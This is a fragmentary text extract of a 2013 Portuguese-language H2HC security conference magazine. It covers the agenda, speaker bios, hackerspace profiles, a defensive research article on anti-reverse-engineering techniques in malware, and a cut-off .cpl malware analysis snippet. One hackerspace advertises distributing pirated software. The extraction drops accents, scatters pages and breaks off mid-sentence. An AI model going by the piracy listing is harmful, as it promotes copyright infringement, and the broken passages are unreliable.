Escolar Documentos
Profissional Documentos
Cultura Documentos
DATACENTER
REDE
MOBILE
ENDPOINT
APLICAO
COMPLIANCE
GERENCIAMENTO
Enterprise Security
H2HC MAGAZINE
Edio 5
Outubro de 2013
Direo Geral /
Editor:
Rodrigo Rubira Branco
Jota Mossadihj
Claudia Bucci
Grabriel Negreira Barbosa
Fernando Mercs
Victor Hugo P. Gonalves
Ferdinando Kun
Ricardo Logan
Ana Luiza Mano
Paulo Veloso
rea 31 HackerSpace
SJC Hacker Clube
Oeste Hacker Clube
V Hacker Clube
Garoa Hacker Clube
Anchises de Paula
Eduardo Kislanski (Oys)
Diretora de Arte /
Criao:
Amanda Vieira
Coordenadora
Administrativa /
Mdias Sociais:
Laila Duelle
Redao:
Jordan M. Bonagura
Impresso:
FullQualIty
Agradecimentos
NDICE
ESPECIAL H2HC - 4 A 17
PALESTRANTES - 6 A 11
HACKER CLUBES - 18 A 25
ARTIGOS - 26 A 48
REPORTAGEM FILE SP - 49 A 51
H2HC WORLD - 52
HORSCOPO - 54
AGENDA H2HC
DIA 1 (05/10)
8:20
8:50
9:20
10:20
11:20
11:50
12:50
AUDITRIO EXA
Keynote 1:
Felix FX Lindner
H2CSO
H2CSO
INTERVALO
Android: Game of Obfuscation:
Bremer & Chiossi
H2CSO
ALMOO
14:00
15:00
16:00
17:00
AUDITRIO GIGA
DIA 2 (06/10)
9:20
10:20
11:20
11:50
12:50
14:00
15:00
16:40
18:00
AUDITRIO GIGA
Keynote 2:
Charlie Miller
AUDITRIO EXA
BSides SP
BSides SP
INTERVALO
Adventures in Automotive Networks and Control
Units: Valasek & Miller
BSides SP
ALMOO
BSides SP
BSides SP
BSides SP
ENCERRAMENTO
Palestrantes
Andres Riancho
Andres Riancho um especialista em segurana de aplicaes que atualmente atua
na comunidade Open Source com o projeto w3af que prove servios para Pentest de
Aplicaes Web para empresas no mundo.
Na rea de pesquisa, ele descobriu vulnerabilidades crticas em appliances IPS da
3Com, contribuiu tambm com a pesquisa realizada com SAP em um de seus exempregadores e relatou centenas de vulnerabilidades em aplicaes web.
Seu foco principal sempre foi o campo de segurana de aplicaes Web, no qual desenvolveu o w3af,
um framework para Aplicaes Web e Auditoria amplamente utilizado pelos consultores de segurana
e pentesters. Andrs palestrou e ministrou treinamentos em diversas conferncias de segurana ao
redor do mundo, como PHDays (Moscow), SecTor (Toronto), OWASP (Polnia), CONFidence (Polnia),
OWASP World c0n (EUA), CanSecWest (Canad), T2 (Finlndia ) e Ekoparty (Buenos Aires).
Andres fundou a empresa Bonsai em 2009, que uma consultoria focada na web com o objetivo de
melhor pesquisar sobre deteco de vulnerabilidades e explorao automatizada de aplicaes Web.
Suas Especialidades: Segurana em Aplicaes Web, Python, evaso de IPS, pesquisa de segurana
da informao em geral, desenvolvimento de software Agile e Scrum.
Brad Spengler
Eu tenho uma tia que se comunica no mesmo estilo que o Spengler. Ou ela faria se
ela pudesse - Ningum fala com ela. Ningum quer. -nix
O grande nmero de bons desenvolvedores que no vo perto porque ele muito
desagradvel e no esto indo para prestar ateno no Spengler, porque ouvir suas
lies de segurana como ficar bem louco com cido-nix
3812e371986ad24ace67bab90fd07ca4 No contam como relatar uma falha, mesmo que fosse preciso. Para quem estiver interessado, ele realmente me enviou um email com isto. Que eu no tinha idia do que isso significava. Vrios meses depois que eu aprendi o que
era o hash MD5 de uma frase explicando como meu cdigo no funcionou e foi bastante merda poderia
ter tido tudo isso esclarecido muito mais rpido se voc acabou de me dizer. -Eric Paris
Spender no um profissional de segurana, ele um blackhat puro e simples. -Joshua Brindle
Brad Spengler tambm desenvolveu grsecurity e esteve envolvido na segurana do Linux por mais de
uma dcada.
Julian Bangert
Julian Bangert estudante junior de cincia da computao na Dartmouth College.
Quando ele no est trabalhando em novos mecanismos de defesa ou pegando cachoeiras em seu caiaque, ele um cowboy do Norte Appalachia que captura espcimes para a mquina do estranho zoolgico do seu professor Sergey Bratus.
Rebecca Shapiro
Rebecca. Bx Shapiro estudante em uma faculdade pequena no Norte Appalachia.
Ela gosta de mexer com sistemas de maneiras para poder encontrar fontes ocultas de
computao. Ela espera continuar este trabalho para encontrar mais espcimes para
a mquina do estranho zoolgico de Sergey Bratus.
Sergey Bratus
Sergey Bratus um Professor Assistente de Pesquisa de Cincia da Computao na
Dartmouth College. Ele tenta ajudar colegas acadmicos para entender o valor e a
relevncia da pesquisa hacker. sua ambio colecionar e classificar todos os tipos
de mquinas estranhas, ele tambm um membro da conspirao http://langsec.org
para eliminar grandes classes de erros.
Jurriaan Bremer
Pesquisador de segurana Freelancer da Holanda interessado nas reas de engenharia reversa, anlise de malware, segurana mvel, e no desenvolvimento de software para auxiliar na anlise de segurana. Jurriaan ocasionalmente tem participa de
Capture the Flag como membro da equipe De Eindbazen CTF em seu tempo livre, ele
funciona como um dos principais desenvolvedores de Cuckoo Sandbox.
Rodrigo Chiossi
Pesquisador de segurana profissional do Brasil, ele vem trabalhando com Segurana em Android por cerca de 3 anos no laboratrio de pesquisas da Samsung em
Campinas, So Paulo. Rodrigo o fundador do projeto AndroidXRef e tambm um
dos membros da equipe de rede wargame SmashTheStack. Ele eventualmente gosta
de jogar ctfs com a equipe de Bandits binrio e o atual vencedor do Desafio Malware Android de BSides Londres.
Jan Seidl
Apaixonado por *NIX, BSD, C & Python. Profissional e pesquisador em segurana da
informao, recentemente especializando-se em segurana de automao (SCADA/
ICS), pentester e pesquisador de malware dedicado com larga experincia administrando a segurana de servidores, redes e aplicaes.
Autor do blog de infosec http://wroot.org, pesquisador na DC Labs e atualmente coordenador tcnico da TI Safe Segurana da Informao.
Charlie Miller
Antes de seu emprego atual, ele passou cinco anos trabalhando para a Agncia de
Segurana Nacional. Miller demonstrou suas habilidades em Hacking publicamente
sobre os produtos fabricados pela Apple. Em 2008 ele ganhou um prmio de US $
10.000 no Pwn2Own, conferncia hacker em Vancouver no Canad, por ser o primeiro a encontrar um bug crtico no ultrafino MacBook Air. No ano seguinte, ele ganhou US $ 5.000 para achar uma falha no Safari.
Em 2009, ele tambm demonstrou uma vulnerabilidade de processamento de SMS que permitiu comprometer por completo o iPhone da Apple e os ataques de negao de servio em outros telefones. Em
2011 ele descobriu uma falha de segurana em um iPhone ou iPad no qual um aplicativo pode contatar
um computador remoto para baixar o novo software no aprovado que pode executar qualquer comando
que poderiam roubar dados pessoais ou utilizar aplicativos e funes do iOS para fins maliciosos.
Como prova de conceito, Miller criou um aplicativo chamado Instastock que foi aprovado pela App Store
da Apple. Ele, ento, informou a Apple sobre a falha de segurana, que, ento, prontamente expulsou-o
da App Store. Ele est recentemente fazendo uma pesquisa sobre a descoberta de vulnerabilidades de
segurana em NFC (Near Field Communication). Miller tem Ph.D. em matemtica pela Universidade de
Notre Dame, e atualmente vive em St. Louis, Missouri.
Edmond Rogers
Antes de se juntar equipe, Edmond Rogers foi envolvido ativamente como um participante da indstria em muitas das atividades de pesquisa no programa TCIPG do
ITI. Essas atividades incluram NetAPT (Ferramenta de Poltica de Acesso de Rede)
e LZFuzz (Proprietary Fuzzing Protocol). Antes do ITI, Edmond era um analista de
segurana para AMEREN Servios a Fortune 500 com Investidores Utility Owned, e
suas responsabilidades incluam a segurana ciberntica e os aspectos de conformidade da rede SCADA de Ameren.
Antes do utilitrio, Edmond era um Gerente de Segurana e arquiteto de rede para Boston Financial Data
Systems (BFDS). BFDS era um agente de transferncia de 43% de todos os fundos mtuos. Edmond
comeou sua carreira fundando um dos primeiros Internet Service Providers em Kentucky, Bluegrass.
Net.
Rogers aproveita sua vasta experincia para auxiliar pesquisadores ITI na criao de condies de laboratrio que reflete de perto a configurao do mundo real.
Joaquim Espinhara
Joaquim Espinhara um consultor de segurana da Trustwave. Ele um membro
da Trustwave SpiderLabs - a equipe de segurana avanada focada em pentest, resposta a incidentes e segurana do aplicativo.
Espinhara tem sete anos de experincia e tem feito pesquisa de segurana. Apresentou palestras em conferncias de segurana (H2HC, YSTS, SilverBullet e Vale
Security Conference) nas reas de redes sem fios, pentest, segurana em SAP,
segurana de banco de dados. Tambm tem interesse em engenharia reversa do cdigo e pesquisa de
vulnerabilidades. Entusiasta em ciberguerra.
Ulisses Albuquerque
Ulisses Albuquerque um consultor de segurana dentro de Segurana de Aplicaes na SpiderLabs da Trustwave. Ele possui uma forte formao em engenharia
de software, com experincias que vo desde o desenvolvimento de drivers de dispositivo Linux para sistemas embarcados para a concepo e implementao de um
ecossistema de software de misso crtica MSS.
Ulisses tem uma larga experincia em tanto em testes de aplicativos como de rede,
e particularmente interessado em plataformas mais obscuros / nicho. Ele tem um
relacionamento de longa data com vrios projetos de software livre, e tem trabalhado extensivamente
com vrias ferramentas de segurana abertas. Ulisses tambm lecionou vrios cursos sobre segurana
de rede, buffer overflows e desenvolvimento de aplicaes web seguras em vrios cursos de ps-graduao.
Felix FX Lindner
Felix FX Lindner da Recurity Labs. FX tem mais de 10 anos de experincia na
indstria de computadores, oito deles em consultoria para grandes empresas e clientes de telecomunicaes. Possui vasto conhecimento de cincias da computao,
telecomunicaes e desenvolvimento de software. Sua formao inclui gesto e participao em uma grande variedade de projetos com nfase em planejamento de segurana, implantao, operao e testes utilizando mtodos avanados em diversos
ambientes tcnicos. FX bem conhecido na comunidade de segurana de computadores e apresentou sua pesquisa Phenoelits na Black Hat Briefings, CanSecWest, PacSec, DEFCON,
Chaos Communication Congress, MEITSEC e vrios outros eventos. Seus temas de pesquisa incluiram
Cisco IOS, impressoras HP, SAP e RIM BlackBerry. Felix tem um ttulo de Estado-Certificado de Assistente Tcnico de Informtica e Tecnologia da Informao, bem como Certified Information Systems
Security Professional.
Fernando Mercs
Fernando Engenheiro Regional da TrendLabs da Trend Micro - Brasil
Entusiasta de Open Source
Programador College-Level em C
Mantenedor do PEV, um kit de ferramentas para anlise de arquivo executvel e outras ferramentas relacionadas a segurana da informao.
A +, LPIC-3, certificado MCP
Palestrante da H2HC, FISL, LinuxCon e outras conferncias
Amante Debian GNU / Linux
Grande f de Cerveja
Jonathan Brossard
Jonathan um brasileiro nascido por engano no corpo de um Francs !! Desde a
adolescncia, ele tenta combater essa injustia comendo tanto picanha (e mulher .br,
porm com muito menos sucesso). J palestrou vrias vezes na Blackhat, Defcon,
CCC e HITB.
Apaixonado pelo vasco, MPB e principalmente pelo assembly, ele opera due dilligence e Redteaming para empresas do top 500 no mundo inteiro. No momento, ele
vive na Austrlia aonde atua como CEO da AFQ.
Julien Venegue
Julien Vanegue um profissional com experincia em engenharia reversa, programao e anlises de explorao. Liderou o ELF shell / projeto ERESI e desenvolveu o
verificador HAVOC Microsoft. Julien trabalha como arquiteto de Segurana em Nova
York, EUA.
Otvio Cunha
Otvio Cunha, Engenheiro Eletrnico, trabalha h 30 anos na rea de segurana de informao e comunicaes.
PaX Team
Para no ser superado pelo Spender, aqui vo algumas citaes:
Spender: Ainda bem que voc no um dos muitos perdedores egostas que comumente encontramos na comunidade de segurana
Ivan Arce: @ sergeybratus Eu j disse a alguns deles que PaX foi a inovao de
segurana mais importante das ltimas dcadas
A Equipe PaX tem desenvolvido, voc adivinhou, Pax, nos ltimos 12 anos. Se voc
acha que seu rabo foi salvo por este trabalho no passado, voc nosso convidado
para nos pagar uma cerveja!
Tony Rodrigues
Um gestor experiente na indstria de tecnologia da informao, utilizando fortes habilidades de tecnologia da informao para implementar estratgias de negcios e melhorar os processos. Tony possui mais de vinte anos de experincia em TI, 11 anos de
trabalho para as empresas de todo o mundo e oito anos na posio de meio-gesto;
Palestrante em Segurana da Informao, Computao Forense e eventos da conscincia da continuidade de negcios; Apresentaes Conferncias Internacionais
(CNASI, H2HC, YSTS, OWASP AppSec, WebSecForum, SegInfo, ValeSecInfo); Especialista em forense
computacional,
10
Diego Fuschini
Profissional de Segurana da Informao Independente
Chris Valasek
Valasek o Diretor de Inteligncia de Segurana na IOActive. Como parte da equipe
de pesquisa de segurana no Gabinete do CTO da Coverity, Antes da Coverity, Valasek era um cientista de pesquisa snior no Accuvant Labs e IBM Internet Security
Systems.
O foco de pesquisa de Valasek abrange reas como descoberta de vulnerabilidade,
tcnicas de explorao e engenharia reversa, contribuindo para divulgaes pblicas
e pesquisa de autoria sobre estes temas para a comunidade de segurana em geral.
Valasek apresentou sua pesquisa em grandes conferncias internacionais de segurana como Black
Hat, incluindo EUA e Europa, Ekoparty, Infiltrate, e RSA, e o presidente do SummerCon, a conveno
de hackers mais antiga do pas.
Stefano Zanero
Stefano Zanero recebeu um PhD em Engenharia da Computao pela Politcnica
de Milano, onde atualmente professor assistente no Departamento de Eletrnica,
Informtica e Bioengenharia. A sua investigao centra-se na deteco de intruso,
anlise de malware, e sistemas de segurana. Alm de ensinar Segurana Informtica no Politcnico, ele tem uma extensa experincia de formao na Itlia e no exterior. Ele foi co-autor de mais de 40 artigos cientficos e livros. um editor associado
do Jornal de computao Virologia. Ele um membro snior do IEEE (cobrindo
posies de voluntrios a nvel nacional e regional), o IEEE Computer Society (para o qual ele membro
do Conselho de Administrao), e membro vitalcio da ACM. Stefano tambm co-fundador do captulo
italiano da ISSA (Information System Security Association), da qual ele membro snior. A muito tempo
escritor para revistas (entre os quais World Computer), Stefano tambm co-fundador e presidente
da Secure Network Srl, empresa de consultoria lder italiana em informaes de segurana.
Travis Goodspeed
Travis Goodspeed um engenheiro reversa do sul dos Apalaches, onde ele est em
processo de restaurao de uma TV para a digitalizao de torres de microondas.
Seu trabalho anterior inclui o ataque Packet-in-Packet, um disco rgido ativamente
anti-forense, e a placa Facedancer para emulao de dispositivo USB.
11
12
13
ocupaes sobre um tema, mas tambm observarmos o ponto de vista dos gestores das reas
de segurana, afinal o mercado formado por
dois lados de uma mesma moeda, diz Paulo
Veloso.
No seu segundo ano frente da moderao do
painel, Galeno Garbe divide sua viso como
moderador e explica a importncia desse painel
dentro de um evento como o H2HC. O painel
Hacker to CSO um dos pontos altos do evento
e o nico com esse formato no mundo. uma
oportunidade singular para ouvir assuntos atuais
H2HC 10 ANOS!
15
16
queramos
fazer algo com o
verdadeiro
esprito hacking,
onde todas as
palestras
tinham que ter
uma demonstrao
prtica como prova
do conceito
apresentado
ca teve fins financeiros, onde em alguns anos
tivemos que bancar o prejuzo do prprio bolso.
H2HC: E o por que do nome Hackers to Hackers?
R: O nome foi criado pois literalmente descrevia
os objetivos do evento, e nos causou diversos
desafios desde o incio.
Sabamos que muitas empresas iriam ver a palavra hacker de forma errnea, mas estvamos
dispostos a lutar por isso.
Na quinta edio tudo estava atrasado e parecia que no conseguiramos fazer o evento, eu
estava fora do pas e a coisa no movia, ento
propus ao comit que eu topava voltar e fazer
tudo acontecer, mas que dali para diante eu tomaria as decises, me reunindo com a galera
(que eu chamo de os Originais) de tempos em
tempos para coletar feedbacks. Chamei ento o
Balestra pra me ajudar e conseguimos fazer a
conferncia acontecer!
Ygor: Foi isso mesmo. Como quem organizava veio de um meio no muito organizado (do
underground hacker), tnhamos dificuldades
de fazer a coisa acontecer. A conferncia nun-
R: Nossa, muito mudou. A conferncia cresceu, a qualidade das palestras aumento absurdamente, com forte presena internacional (de
fato, na 6a edio do evento fizemos uma vota-
SABAMOS QUE
MUITAS EMPRESAS
IRIAM VER A PALAVRA HACKER DE
FORMA ERRNEA,
MAS ESTVAMOS
DISPOSTOS A LUTAR
POR ISSO
17
18
E foi apenas
quando estes 4
grupos se
juntaram que
conseguimos a
sinergia
necessria para
tocar esse ideal
encontrar uma casa, alug-la, montar uma infraestrutura bsica, criar as documentaes
mnimas para gerenciar o clube, e fazer nossochurrasco de inaugurao, no dia 7 de abril
de 2013
Fundao: 07/04/2013
Endereo: Rua Copenhague, 161 Jardim Augusta So Jos dos Campos So Paulo
Membros: 43
Atividades: Arduno, sistemas operacionais,
hacking, eletrnica, robtica, clube do livro, noite
de filmes, marcenaria, japons, cubo mgico,
lockpicking, entre outros.
E foi apenas quando estes 4 grupos se juntaram que conseguimos a sinergia necessria
para tocar esse ideal. Em apenas um ms, com
a colaborao de vrias pessoas, conseguimos
19
20
rea 31 HackerSpace
Site: http://www.area31.net.br
Fundao: 11/08/2013
Endereo: Bairro Anchieta - Belo Horizonte Minas Gerais (restrito por enquanto apenas a
membros convidados)
Membros: 12
Atividades: Oficinas de raspberry pi, arduno, impressoras 3D, modelagem 3D e sistemas operacionais Unix e familiares. Administrao, hacks,
ajustes, reparos e demais desenvolvimentos de
projetos de tecnologia, cultura e educao digital.. Em breve novas atividades.
21
V Hacker Clube
isando criar um Hackerspace diferenciado, verdadeiramente anarquista, revolucionrio, transgressor, libertrio e subversivo, sem regras, sem membros pagantes, sem
restries artificiais e disponvel 24 horas (na
medida do possvel), Igor Isaias Banlian cedeu
a garagem de sua casa para a fundao do V
Hacker Clube, que ser feita em breve, assim
que tal espao esteja devidamente preparado
para receber um Hackerspace.
Mdia:
Blog: www.vhackerclube.tk (Em construo!)
Frum: www.vhackerclube.tk/forum (Em construo!)
Wiki: www.vhackerclube.tk/w (Em construo!)
Local:
Rua Brasiluso Lopes, 154A
Bairro: Jardim Peri
22
Cep.: 02634-020
So Paulo / SP
UM
HACKERSPACE
DIFERENCIADO,
VERDADEIRAMENTE
ANaRQUISTA,
REVOLUCIONRIO,
TRANSGRESSOR,
LIBERtrio e
subversivo, sem
regras, sem
membros pagantes,
sem restries
artificiais e
disponvel 24
horas
ideolgicos (sem censura);
Disponibilizao de softwares (Warez);
Atividades planejadas:
23
24
a primeira
divulgao
pblica da idia
de criar um
hackerspace na
cidade de So
Paulo aconteceu
na Campus Party
de 2010
teceu na Campus Party de 2010, e em julho
deste mesmo ano ocorreu uma primeira reunio
presencial do grupo que vei a fundar o Garoa.
Em agosto de 2010 criamos um espao fsico
permanente de 12m, em um pequeno poro da
Casa da Cultura Digital (CCD).
Nesta sede comeamos a organizar eventos
regulares, desenvolvemos vrios projetos individuais e coletivos, e conseguimos constituir
uma associao sem fins lucrativos para dar
apoio administrativo e financeiro para as atividades do Garoa. O Garoa permaneceu na CCD
at Fevereiro de 2013, quando mudou para uma
nova sede, uma ampla casa em Pinheiros.
Endereo: Rua Costa Carvalho, 567 Fundos.
Pinheiros, So Paulo-SP. CEP 05429-130
Inaugurao: 28 agosto de 2010
Fundao: 20 de fevereiro de 2011
Membros: aproximadamente 40 associados
IRC: #garoa em irc.freenode.net
Lista de discusso: hackerspacesp@googlegroups.com
Twitter: @garoahc
Identi.ca: !garoa
25
Utilizao de Anti-Engenharia
Reversa por Malware
POR GABRIEL NEGREIRA BARBOSA
Introduo e Objetivos
Ataques a sistemas computacionais causados por
malware um problema atual [1] [2] [3], de difcil
soluo [4]. Com o passar do tempo, os malware
esto cada vez mais desenvolvidos [4] [5] [6] [7]
e difceis de detectar [4]. Tais fatores, aliados
grande quantidade (centenas de milhares) de novos malware sendo descobertos diariamente [8],
dificultam a anlise do atual cenrio.
Analisar o comportamento dos malware atualmente ativos pode ajudar a melhorar as protees
existentes. Porm, dado o grande nmero de novos malware, tal pesquisa deve ser realizada com
uma quantidade compatvel de amostras. Adicionalmente, deve-se utilizar malware atuais.
Este artigo tem por objetivo descrever a utilizao
de tcnicas de anti-engenharia reversa por malware, com base em uma pesquisa intitulada Scientific but Not Academical Overview of Malware
Anti-Debugging, Anti-Disassembly and Anti-VM
Technologies inicialmente divulgada na BlackHat
2012 Las Vegas (o autor deste artigo tambm
um dos autores dessa pesquisa utilizada como
base) [9] [10].
A Seo 2 descreve o Dissect || PE [11], o projeto
de analise automatizada de malware utilizado na
pesquisa.
A Seo 3 discute a metodologia utilizada para
chegar nos resultados discutidos na Seo 4.
Por fim, a Seo 5 conclui o trabalho e a Seo 6
lista as referncias utilizadas ao longo deste artigo.
Projeto Dissect || PE
Dissect || PE um projeto gratuito e de arquitetura aberta de uma plataforma completa de anlise
automatizada de malware, constantemente
mantida por profissionais da rea. O cdigo no
aberto, porm a arquitetura constantemente
publicada para ajudar pesquisadores a codificar
suas prprias plataformas [12]. Atualmente, somente malware de Windows so suportados por
tal projeto. A principal ideia por trs do projeto
26
Estima-se que o
projeto tenha
mais de
30 milhes de
samples nicos em
sua base de malware que est em
constante
expanso
contribuir com a comunidade, provendo:
Poder computacional e uma atualizada base
de malware para pesquisadores ao redor do
mundo. Uma pesquisa sobre o cenrio de malware (e no sobre certos malware especficos)
deve se basear em experimentos com uma quantidade de amostras compatvel com as centenas de
milhares de malware descobertos semanalmente.
Porm, tal quantidade de boas amostras e poder
computacional para tal processamento no esto
disponveis para a grande maioria dos pesquisadores.
Pesquisas de qualidade para a comunidade. O
Dissect || PE possui uma equipe de pesquisadores
que constantemente publica trabalhos em conferncias renomadas [12]. Os resultados de tais
pesquisam visam melhorar as atuais protees,
aprimorar a compreenso sobre o atual cenrio de
malware, e prover detalhes sobre samples especficos.
Estima-se que o projeto tenha mais de 30 milhes
de samples nicos em sua base de malware que
est em constante expanso. Os malware so obtidos atravs da troca de samples com parceiros
(pesquisadores renomados e empresas importantes). A ttulo de exemplo, diariamente o projeto
recebe 150 GB de novos malware. O Mapa 1 ilus-
27
enviar ao plugin, via argumentos (argv), informaes sobre o malware como por exemplo o caminho completo para o binrio. O plugin deve enviar
sada padrao os resultados do processamento.
Desta forma, o tratamento de plugins independente de linguagem de programao.
Atualmente, o sistema suporta plugins escritos em
C e Python. Porm, pode-se, de forma trivial, adicionar suporte a qualquer outra linguagem de programao. Se algum pesquisador que deseja executar plugins na plataforma necessite de alguma
outra linguagem de programo, basta contatar a
equipe do projeto que s no ser adicionado suporte se isso colocar o sistema em risco. Os cdigos 1 e 2 possuem exemplos de plugins.
print Plugin em Python - Cdigo 1 Plugin
escrito em Python cujo resultado capturado pelo
sistema a string Plugin em Python.
#include <stdio.h>
int main(int argc, char **argv) {
printf(Plugin em C\n);
return 1;
} - Cdigo 2 Plugin escrito em C cujo resultado
capturado pelo sistema a string Plugin em C.
Os plugins podem ser de dois tipos: estticos e
dinmicos. Os estticos so utilizados para anlise
esttica, ou seja, sem realizar a execuo do malware por exemplo, a anlise do disassembly do
malware. Os dinmicos so utilizados para anlise
dinmica, ou seja, em uma mquina virtual onde
o malware executado por exemplo, deteco
de arquivos criados pelo malware. Adicionalmente,
ressalta-se que durante a anlise dinmica o
trfego de rede capturado pelo sistema.
Metodologia
Nesta pesquisa, foram analisados 4.030.945 de
malware provenientes de parceiros com alto grau
de confiabilidade, em uma infra-estrutura com 72
cores e 100 GB de RAM (distribudos nos 9 servidores do back-end). Somente foram utilizados
samples PE 32-bit.
O principal foco da pesquisa apresentada por este
artigo estudar a utilizao de tcnicas de antiengenharia reversa por malware. As categorias de
28
Uma anlise
esttica tambm
est vulnervel a
protees
implementadas no
malware
tcnicas de anti-engenharia reversa utilizadas na
pesquisa so:
Anti-debugging: Tcnicas para comprometer
debuggers e/ou o processo de debugging.
Anti-disassembly: Tcnicas para comprometer disassemblers e/ou o processo de disassembly.
Ofuscao: Tcnicas para dificultar a criao
de assinaturas e deixar o cdigo disassemblado
mais difcil de ser analisado por um profissional.
Anti-VM: Tcnicas para detectar e/ou comprometer mquinas virtuais.
Esta pesquisa tambm analisou a utilizao de
packers por malware. Com relao aos packers,
ressalta-se:
Samples com packer: Diferentes samples com
o mesmo packer foram contabilizados como 1 s
sample. Isso se deve ao fato de que essa pesquisa
no realizou o unpacking, e desta forma analisar
mais de um sample com o mesmo packer implicaria em analisar o mesmo cdigo mais de uma vez.
Todos os packers foram analisados e suas caractersticas podem ser encontradas no artigo original
dessa pesquisa [10].
Samples sem packer: Evitou-se utilizar samples maiores que 3,9 MB por motivos de desempenho. Porm, alguns samples maiores que esse
tamanho foram analisados, como por exemplo o
malware Flame.
Esta pesquisa utilizou somente anlise esttica,
seja executvel). Essa abordagem reduz a probabilidade de se analisar dados como sendo cdigo
e otimiza o tempo de anlise. Sees no executveis, mesmo que referenciadas por sees analisadas, no foram analisadas: futuras pesquisas
cobriro esta lacuna.
Antes de ir para produo, cada plugin executado contra um conjunto pr-estabelecido de 883
malware. Esse processo foi utilizado para detectar
bugs, testar o desempenho e validar a deteco
de tcnicas de anti-engenharia reversa.
As tcnicas de anti-engenharia reversa utilizadas
nesse trabalho foram selecionadas das seguintes
fontes:
Artigos estado-da-arte.
Malware que so encontrados atualmente em
sistemas computacionais.
Resultados e Discusso
Todos os malwares da pesquisa (4.030.945) foram
submetidos a algoritmos de deteco de packers e
os resultados esto exibidos no Grfico 1.
29
Esta pesquisa, que analisou tcnicas de anti-engenharia reversa presentes em malware, pode ser sumarizada pelo Grfico 4.
O Grfico 4 diz que em 88,96% dos malware analisados foram encontrados ao menos 1 tcnica de
anti-engenharia reversa. Tal cifra pode ser um
forte indcio de que, somente detectando tcnicas de anti-engenharia reversa, pode-se detectar
a grande maioria dos malware. Como ambientes
corporativos possuem (ou deveriam possuir) controle sobre as solues de software presentes, os
casos em que alguma tcnica de anti-engenharia
reversa esteja presente poderiam ser adicionados
a uma whitelist a fim de reduzir falso-positivos.
O Grfico 5 mostra a prevalncia das categorias
de tcnicas de anti-engenharia reversa nos malware analisados.
Como pode ser observado, as duas categorias mais prevalentes so, respectivamente, anti-VM e ofuscao. Os grficos 6, 7, 8 e 9 mostram, para cada categoria, as tcnicas de anti-engenharia reversa
mais prevalentes. Explicaes sobre cada tcnica podem ser encontradas no trabalho base desse artigo [10] e cdigos prova de conceito podem ser encontrados no endereo: https://github.com/rrbranco/
blackhat2012.
31
Grfico 7 Tcnicas de
anti-debugging mais prevalentes
Grfico 8 Tcnicas de
ofuscao mais prevalentes.
32
Adicionalmente, ressalta-se que foram encontrados malware com mais de uma tcnica de anti-engenharia reversa. Logo, as porcentagens exibidas
em grficos relativos a tcnicas de anti-engenharia
reversa e suas categorias, se somadas, totalizam
mais de 100%.
Concluses
Esta pesquisa mostra que, dos milhes de malware analisados, 88,96% possuem ao menos uma
tcnica de anti-engenharia reversa implementada.
Tendo em vista a quantidade e a qualidade dos
malware analisados, tal dado um forte indcio de
que a maioriados malware atuais esto utilizando
tcnicas de anti-engenharia reversa.
Determinar se um dado software um vrus um
problema indecidvel [14]. Porm, essa pesquisa
mostrou um forte indcio de uma caracterstica presente nos malware que incomum em solues
de software corporativas e quando presentes podem ser adicionadas a whitelists.
Desta forma, este trabalho mostra fortes indcios
de que a maioria dos malware podem ser detectados atravs da deteco de tcnicas de antiengenharia reversa. Ressalta-se que no se est
violando a indecidibilidade citada anteriormente, e
sim explorando uma assinatura genrica inserida
nos malware por seus autores.
Conclui-se tambm que analisar o atual comportamento e caractersticas dos malware pode contribuir com as atuais protees. Porm, devido
grande quantidade de malwares, tal tipo de estudo
pode ser viabilizado por sistemas de anlise automatizada de malware como o Projeto Dissect ||
PE.
Referncias
[1] Michael Mimoso Theatpost NJRAT ESPIONAGE
MALWARE TARGETS MIDDLE EASTERN GOVERNMENTS, TELECOMS AND ENERGY http://threatpost.
com/njrat-espionage-malware-targets-middle-easterngovernments-telecoms-and-energy/101162 Acessado
em Julho/2013.
[2] Michael Kan IDG News Services http://idgnow.uol.
com.br/internet/2013/07/04/china-tem-mais-ataques-demalware-e-botnet-vindos-de-outros-paises/ - Acessado
em Julho/2013.
[3] Tim Wilson Dark Reading Study: Nation-States
Are Primary Drivers Behind APTs - http://www.darkreading.com/vulnerability/study-nation-states-are-primarydrivers/240157838 Acessado em Julho/2013.
[4] Altieres Rohr G1 Flame foi um fracasso para a
indstria antivrus, diz especialista Acessado em: Julho/2013.
[5] Ryan Naraine ZDNet Stuxnet attackers used 4
Windows zero-day exploits http://www.zdnet.com/blog/
security/stuxnet-attackers-used-4-windows-zero-dayexploits/7347 Acessado em: Julho/2013.
[6] McAfee Attack: Duqu http://www.mcafee.com/us/
about/duqu.aspx Acessado em: Julho/2013.
[7] Pedro Drimel Neto Qualys VMRL Morto Architecture Review - https://community.qualys.com/blogs/securitylabs/2011/11/11/morto-architecture-review Acessado em: Julho/2013.
[8] Kaspersky 2012 by the numbers: Kaspersky Lab
now detects 200,000 new malicious programs every day - http://www.kaspersky.com/about/news/virus/2012/2012_by_the_numbers_Kaspersky_Lab_now_
detects_200000_new_malicious_programs_every_day
Acessado em: Julho/2013.
[9] Rodrigo Rubira Branco, Gabriel Negreira Barbosa,
Pedro Drimel Neto Black Hat 2012 Las Vegas Presentation Scientific but Not Academical Overview of
Malware Anti-Debugging, Anti-Disassembly and Anti-VM
Technologies http://research.dissect.pe/docs/blackhat2012-presentation.pdf Acessado em: Julho/2013.
[10] Rodrigo Rubira Branco, Gabriel Negreira Barbosa,
Pedro Drimel Neto Black Hat 2012 Las Vegas Paper
Scientific but Not Academical Overview of Malware AntiDebugging, Anti-Disassembly and Anti-VM Technologies
http://research.dissect.pe/docs/blackhat2012-paper.
pdf Acessado em: Julho/2013.
[11] Projeto Dissect || PE https://www.dissect.pe
Acessado em: Julho/2013.
[12] Dissect || PE Research http://research.dissect.pe
Acessado em: Julho/2013.
[13] Rodrigo Rubira Branco, Gabriel Negreira Barbosa
IEEE Malware 2011 Distributed malware analysis
scheduling.
[14] Fred Cohen Computer Viruses - Theory and Experiments.
33
$ file Convite.cpl
Convite.cpl: PE32 executable (DLL) (GUI) Intel
80386, for MS Windows
Usando o readpe [1] possvel notar uma caracterstica bem peculiar dos arquivo .cpl, que a presena de uma funo CPLApplet() na EAT:
$ readpe --exports Convite.cpl
Exported functions
0:
CplApplet
35
DUVIDA?
$ hd -n 256 FacebookComents.cpl
00000000 4d 5a 50 00 02 00 00 00
00000010 b8 00 00 00 00 00 00 00
00000020 00 00 00 00 00 00 00 00
00000030 00 00 00 00 00 00 00 00
00000040 ba 10 00 0e 1f b4 09 cd
00000050 54 68 69 73 20 70 72 6f
00000060 74 20 62 65 20 72 75 6e
00000070 69 6e 33 32 0d 0a 24 37
00000080 00 00 00 00 00 00 00 00
04
40
00
00
21
67
